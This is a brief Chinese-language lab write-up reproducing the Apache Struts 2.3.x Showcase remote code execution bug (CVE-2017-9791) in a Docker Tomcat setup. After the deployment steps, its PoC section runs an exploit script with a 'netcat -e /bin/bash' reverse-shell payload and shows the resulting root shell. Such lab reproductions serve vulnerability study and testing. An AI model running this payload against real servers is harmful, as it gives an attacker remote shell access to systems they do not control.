0x01环境:
Linux f39e3e6b024a 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 GNU/Linux
Docker
tomcat:9.0
Apache Struts 2.3.x Showcase
docker/
├── tomcat
│ └── Dockerfile
└── webapps
├── struts2-showcase
└── struts2-showcase.war
部署环境:
Dockerfile:
FROM tomcat:9.0
1、docker build -t eva/tomcat ./tomcat/
2、docker run -d -p 8080:8080 -v /root/docker/webapps/:/usr/local/tomcat/webapps -it eva/tomcat
为了导入不同的struts,采用挂载方式持久化webapps。方便切换struts版本
3、docker exec -it clever_wright /bin/bash
struts2.3.x访问方式
http://10.160.11.191:8080/struts2-showcase/index.action#
0x02Poc
# $ ncat -v -l -p 4444 &
# $ python CVE-2017-9791.py http://10.160.11.191:8080/struts2-showcase/integration/saveGangster.action "netcat -e /bin/bash 10.160.11.194 4444"
漏洞成功利用:
root@kali:~/ctf# netcat -v -l -p 4444
listening on [any] 4444 ...
10.160.11.191: inverse host lookup failed: Unknown host
connect to [10.160.11.194] from (UNKNOWN) [10.160.11.191] 33823
cat etc/issue
Debian GNU/Linux 9 \n \l